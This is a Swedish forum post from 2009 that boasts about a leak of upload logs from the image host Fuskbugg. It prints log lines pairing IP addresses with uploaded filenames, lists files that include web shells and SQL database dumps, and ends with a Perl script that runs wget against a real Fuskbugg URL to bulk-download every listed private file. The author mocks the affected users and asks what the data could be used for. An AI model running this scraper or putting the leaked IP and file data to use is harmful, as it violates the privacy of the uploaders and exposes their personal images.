2009-10-24, 22:16
#1
Jag har hört på lång ryktesväg att en tapper kämpe från internetgangsters för länge sedan kom över fetmycket data på Fuskbuggs diskar. Det sägs att alla månatliga 25 000 uploads syncats sedan en svartafghansk natt. Tydligen har de haft en koppling till MySQL helt i onödan och lagrat allt i textformat istället utan att strömma något till databasen. Nu har en massa bilder och backuper som privatpersoner laddat upp för sig själva och vänner hamnat i knarkfärgade händer. Erotiska amatörbilder har arkiverats för lulz och script-kiddies som försökt ladda upp r57/c99 och dyl. hånas för fullt. Gatans röst säger att det pågått i flera år och bryter nu ut i offentligt hånflin.
Vad får detta för konsekvenser för Svensson och horsnutar och deras gemensamma Fragbitesmittade avkomma? Vad kan denna enorma datamängd (400686+ personliga filer) användas i för syften? Naturligtvis är allt fint uppradat med timestamp, IP-adress, filnamn och filstorlek. Tihi, :-)
Vad får detta för konsekvenser för Svensson och horsnutar och deras gemensamma Fragbitesmittade avkomma? Vad kan denna enorma datamängd (400686+ personliga filer) användas i för syften? Naturligtvis är allt fint uppradat med timestamp, IP-adress, filnamn och filstorlek. Tihi, :-)
Kod:
$ head -8 upladda.log
15 August 2008, 00:49:02 ; 85.227.199.186 ; trackmypost.JPG ; 0.01 Mb
15 August 2008, 00:49:18 ; 217.209.14.179 ; CONFIGS FFS.rar ; 0.48 Mb
15 August 2008, 00:50:09 ; 83.252.122.252 ; --------bara-lska-den--------.JPG ; 0.17 Mb
15 August 2008, 00:50:31 ; 85.227.199.186 ; topictracker.JPG ; 0.01 Mb
15 August 2008, 00:50:46 ; 83.252.122.252 ; HEJHEJSKRIVBORDDEt.jpg ; 0.17 Mb
15 August 2008, 00:50:47 ; 88.206.221.236 ; odds.jpg ; 0.12 Mb
15 August 2008, 00:51:22 ; 85.225.162.212 ; filmz.txt ; 0 Mb
15 August 2008, 00:52:04 ; 90.230.108.199 ; saigon_vs_23.dem ; 23.61 Mb
$ wc *.log
392543 4393100 28531756 gamla_uploads.log
30884 345563 2276737 upladda.log
423427 4738663 30808493 total
$ grep -Ev '; 0 Mb' *.log > horbugg
$ wc horbugg
400686 4484309 36177529 horbugg
horbugg explode()rar och blir warez.txt:
$ head -8 warez.txt
DSC00018.JPG
______________TOK
_______________cover.jpg
history.txt
Bilder
Bilder
09-28-2005.png
mockup0142-03.png
$ grep 'php' warez.txt
admin.php
tur.php
php-fusion-6-01-6.zip
viewtopic.php.htm
create_image_h.php.png
phpwqh7aj.jpg
phpYcLjqc.jpg
phpMqpJjG.jpg
product_thumb.php.jpg
product_thumb.php.jpg
phpbb_db_backup.sql
image3.php.jpg
viewimage.php2.jpg
pic6.php.gif
hej.php
account_system.php
phpno4ltg.jpg
php1UY4nRAM9.jpg
config1.php
config2.php
config1.php
stdhead.php
_r57shell.php <- lol
list.php.rar
processImage.php.png
bilf111.php.jpg
raqq.php
r57.php <- lol
_c99.php <- lol
bacpic.php.jpg
file.php.gif
_stdhead.php
_stdhead.php
_stdhead.php
stdhead3.php
ecp.php.htm
phpraid.bmp
images.php.gif
getImage.php.jpg
shell.php
inbox.php
wallpaper.php.jpg
image254235.php.png
_getImage.php.jpg
___index.php
sb_pass.php.htm
schema.php
phpk43jb534o6b34.rar
phpxaDid0.jpg
phpvIs7Rk.jpg
phpInBPLu.jpg
index.php.gif
_inbox.php
sig.php.png
php2X8Cwp.jpg
pokemans.php.jpg
_pokemans.php.jpg
sig.php.jpg
phpgYkBM1.jpg
phpYF8oK4.jpg
php_manual_sv.chm
noname.php
__c99.php <- lol
index.php.jpg
c99.php.jpg.jpg <- lol
c99.php.jpg <- lol
php
_bacpic.php.jpg
getImage.php.jpg
php-fusion-6.00.307.zip
preview.php.png
image7.php.jpg
phperror.JPG
scanner.php
ruogxphp.jpg
config.php
get_galleribild.php.jpg
phpbb.bmp
php.png
dumfan.php
config.inc.php
_img.php.jpg
2.php.jpg
bacpic1.php.jpg
-2.php.jpg
logo.php.png
kuk.php
-get_galleribild.php.jpg
get_galleribild.php1.jpg
get_galleribild.php2.jpg
phpbb.JPG
-_img.php.jpg
-shell.php
r57.php.jpg <- lol
webadmin.php
-index.php.jpg
--index.php.jpg
homepage12.php
get_galleribild.php.jpg
sphpblog.tar
sphpblogswe.tar
image.php.png
phpxzZYzz.jpg
phpgbvFWe.jpg
bacpic.php.jpg
pic.php.jpg
-pic.php.jpg
bild2.php.jpg
bild3.php.jpg
bild.php.gif
bild.php.jpg
-bild.php.jpg
insu.php.jpg
php121db.php
php121db.php.html
fetch.jpg.php
faq.php
-faq.php
--faq.php
---faq.php
----faq.php
-----faq.php
------faq.php
c99.php <- lol
fetch.php.jpg
c99.php <- lol
index.php
phpSysInfo-3.0-RC3.tar.gz
-c99.php <- lol
displayImage.php.gif
--c99.php <- lol
---c99.php <- lol
soet.php.jpg
-image.php.png
_img.php.jpg
fetchavatar.php.jpg
tss.php.jpg
theezowns.php.jpg
t4st1ng.php.jpg
yourdeath_phpbb2_se.gif
phpbb_db_backup(2)VENGANCE.rar
--form.php
announce.php
c99.php.jpg <- lol
c.php
-c.php
texts.php
texts.php
---image.php.png
user_image.php.jpg
x.php
-x.php
phpmannenscoreboard.jpg
sh3ll.php.tar.gz
file.php.gif
getImage.php.jpg
---index.php
image_db.php.jpg
phpinfo().html <- ????
image.php.gif
image.php2.gif
php.jpg
-get_galleribild.php.jpg
phpBB3.zip
-------image.php.png
SQLyogTunnel.php
image.php.jpg
--get_galleribild.php.jpg
---get_galleribild.php.jpg
foto_img_big.php.jpg
foto_img_b2ig.php.jpg
file.php.jpg
140r57.php <- lol
toor.php
dump.viewfile.php.jpg
phpbberror.JPG
php5.php
php5.php%20
register.php
-dump.viewfile.php.jpg
--dump.viewfile.php.jpg
---dump.viewfile.php.jpg
----dump.viewfile.php.jpg
--c.php
-c99.php.jpg <- lol
---c.php
-image.php.jpg
-----dump.viewfile.php.jpg
-----dump.viewfile.php.jpg
------dump.viewfile.php.jpg
--image.php.jpg
-------dump.viewfile.php.jpg
-file.php.jpg
phpbb_db_backup.rar
php.JPG
-php.JPG
login.php
-login.php
--login.php
image111.php.png
config.php
-config.php
phpsysinfo-2.5.4.tar.gz
phpSysInfo-3.0-RC4.tar.gz
hihphp.png
-----dump.viewfile.php.jpg
phpQRv8zmPM.jpg
dump.vieDwfile.php.jpg
phpbebisen.bmp
phpThumb.php.jpg
----c99.php <- lol
n0va.php
picture.php.jpg
--pic.php.jpg
---pic.php.jpg
thema.php.htm
index.php.htm
bild.php.jpeg
dumpviewfilephp.gif
-----c99.php <- lol
phpbb3fel.jpg
-dumpviewfilephp.gif
--------image.php.png
file.php.jpeg
bild.php.jpg
-bild.php.jpg
phpmyadmin.jpg
-admin.php
index.php.gif
data.php.png
-image.php.png
----pic.php.jpg
phpThumb.bb.jpeg
system.php
-picture.php.jpg
fuckmeirl.php
get_image.php.png
---image.php.png
gd.php.jpeg
-gd.php.jpeg
wo4i.php.jpg
get_galleribiladd.php.jpg
-get_galleribiladd.php.jpg
------index.php
-------index.php
--------index.php
camimg.php.jpeg
calendar.php
php-fusion-6-01-15.zip
prf_45_image-7.php.jpg
he.php.jpeg
r57.php <- lol
bumblebanner4.php.jpg
asp.html.php
asdf.php
phpeHtOQ4AM.jpg
phpajaBGf.jpg
-bild.php.jpeg
egy_spider.php
php-fusion-7-00.zip
oj.php
filephpavatar1243612187dn3.gif
xshell.php
shell2.php
shell_script.php
evil.php
bolGallery.php
no.gif.php
a.gif.php
forums.php.htm
fuckmeirl.php
get_image.php.png
---image.php.png
gd.php.jpeg
-gd.php.jpeg
wo4i.php.jpg
get_galleribiladd.php.jpg
-get_galleribiladd.php.jpg
------index.php
-------index.php
--------index.php
camimg.php.jpeg
calendar.php
php-fusion-6-01-15.zip
prf_45_image-7.php.jpg
$ grep 'sql' warez.txt
phpbb_db_backup.sql
sql.JPG
mysql.bmp
ascent_sql_cs_dedicated.rar
mysql-5.0.45-win32.zip
sql1.JPG
sql2.JPG
-mysql-5.0.45-win32.zip
--mysql-5.0.45-win32.zip
spyvsqlimax.rar
wse165203_12-03-2007.sql
aceit.sql
mysql.rar
gamepassion.sql
gtlicense.sql
Oracle_Movie_add-on.sql
mysqldump.txt
oracle_10g_sql.rar
users.sql
nicaw_sql_v3.19.zip
localhost.sql.gz
sql.zip
sql
fea123o12201o12o4212l241l412lr.sql
mysq123121244124124124124124afafqwr3p5112o0rq29rk2l.sql
harmonyrpgs-complete_2008-08-02.sql
backup_1223175667_dfedb8a5779efabf.sql
mysql.jpg
libmysql.a
sk.sql.zip
$ cat h0rbugg_d0wnl04d.pl
#!/usr/bin/env perl
use strict;
use warnings;
open my $data_file, '<', 'warez.txt'
or die "Ph3L: $!";
while (my $line = <$data_file>) {
next if $line =~ m/^\*File/;
my @fields = split /\s+/, $line;
readpipe("wget http://data.fuskbugg.se/skalman01/@fields");
}
__________________
Senast redigerad av Ödlan 2009-10-24 kl. 22:20.
Senast redigerad av Ödlan 2009-10-24 kl. 22:20.
